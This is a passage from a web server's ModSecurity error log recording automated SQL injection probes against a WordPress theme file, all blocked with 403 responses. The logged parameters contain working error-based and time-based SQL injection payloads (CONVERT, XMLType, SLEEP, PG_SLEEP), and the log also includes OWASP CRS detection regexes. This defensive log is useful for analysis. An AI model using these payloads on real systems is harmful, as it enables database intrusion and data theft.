"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47' AND 8359=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8359=8359) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113))) AND 'oEox'='oEox"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGPjbJWLg2ecbngu9JZgAAAIU"] [Sun Jul 07 16:18:55.699615 2024] [:error] [pid 31926:tid 139722659718912] [client 141.98.81.37:37810] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47%' AND 8359=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8359=8359) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGP3ug2jzbr_AlO3dz6gAAAME"] [Sun Jul 07 16:18:55.927290 2024] [:error] [pid 31926:tid 139722668111616] [client 141.98.81.37:37812] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47 AND 8359=CONVERT(INT,(SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8359=8359) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113)))-- qOfK"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGP3ug2jzbr_AlO3dz6wAAAMA"] [Sun Jul 07 16:18:56.185328 2024] [:error] [pid 31926:tid 139722567399168] [client 141.98.81.37:37814] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 9044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9044=9044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND (8159=8159"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQHug2jzbr_AlO3dz7AAAAMw"] [Sun Jul 07 16:18:56.658271 2024] [:error] [pid 31926:tid 139722617755392] [client 141.98.81.37:37816] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 9044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9044=9044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQHug2jzbr_AlO3dz7QAAAMY"] [Sun Jul 07 16:18:57.099953 2024] [:error] [pid 30827:tid 139722517042944] [client 141.98.81.37:37818] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 9044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9044=9044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND ('Wucf'='Wucf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQUGuaLybMBNkB61uEgAAAFI"] [Sun Jul 07 16:18:57.582816 2024] [:error] [pid 31926:tid 139722525435648] [client 141.98.81.37:37820] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 9044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9044=9044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'QSmo'='QSmo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQXug2jzbr_AlO3dz7gAAANE"] [Sun Jul 07 16:18:58.033983 2024] [:error] [pid 30826:tid 139722483472128] [client 141.98.81.37:37822] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 9044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9044=9044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQvcO2IzqYGkif72pLwAAABY"] [Sun Jul 07 16:18:58.510206 2024] [:error] [pid 30828:tid 139722651326208] [client 141.98.81.37:37824] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 9044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9044=9044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL)-- jQYd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQjbJWLg2ecbngu9JZwAAAII"] [Sun Jul 07 16:18:59.125694 2024] [:error] [pid 31926:tid 139722550613760] [client 141.98.81.37:37826] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: (SELECT 6903 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(6903=6903,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQ3ug2jzbr_AlO3dz7wAAAM4"] [Sun Jul 07 16:18:59.776671 2024] [:error] [pid 30827:tid 139722617755392] [client 141.98.81.37:37828] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x71766a7671 found within ARGS:ver: (SELECT CONCAT(0x71766a7671,(SELECT (ELT(7428=7428,1))),0x71707a7071))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGQ0GuaLybMBNkB61uEwAAAEY"] [Sun Jul 07 16:19:00.186245 2024] [:error] [pid 30827:tid 139722584184576] [client 141.98.81.37:37830] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: (SELECT (CHR(113)||CHR(118)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5279=5279) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(122)||CHR(112)||CHR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGREGuaLybMBNkB61uFAAAAEo"] [Sun Jul 07 16:19:00.762323 2024] [:error] [pid 30827:tid 139722626148096] [client 141.98.81.37:37832] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CHAR( found within ARGS:ver: (SELECT CHAR(113) CHAR(118) CHAR(106) CHAR(118) CHAR(113) (SELECT (CASE WHEN (8323=8323) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGREGuaLybMBNkB61uFQAAAEU"] [Sun Jul 07 16:19:01.115071 2024] [:error] [pid 30827:tid 139722651326208] [client 141.98.81.37:37834] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47);SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGRUGuaLybMBNkB61uFgAAAEI"] [Sun Jul 07 16:19:01.542407 2024] [:error] [pid 30826:tid 139722567399168] [client 141.98.81.37:37836] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGRfcO2IzqYGkif72pMAAAAAw"] [Sun Jul 07 16:19:02.875592 2024] [:error] [pid 31926:tid 139722634540800] [client 141.98.81.37:37838] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGRnug2jzbr_AlO3dz8AAAAMQ"] [Sun Jul 07 16:19:03.098344 2024] [:error] [pid 31926:tid 139722475079424] [client 141.98.81.37:37840] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGR3ug2jzbr_AlO3dz8QAAANc"] [Sun Jul 07 16:19:04.460309 2024] [:error] [pid 31926:tid 139722533828352] [client 141.98.81.37:37842] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47%';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSHug2jzbr_AlO3dz8gAAANA"] [Sun Jul 07 16:19:04.705153 2024] [:error] [pid 30828:tid 139722642933504] [client 141.98.81.37:37844] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47);SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSDbJWLg2ecbngu9JaAAAAIM"] [Sun Jul 07 16:19:05.149499 2024] [:error] [pid 30828:tid 139722609362688] [client 141.98.81.37:37846] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGSTbJWLg2ecbngu9JaQAAAIc"] [Sun Jul 07 16:19:05.374722 2024] [:error] [pid 30826:tid 139722642933504] [client 141.98.81.37:37848] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match 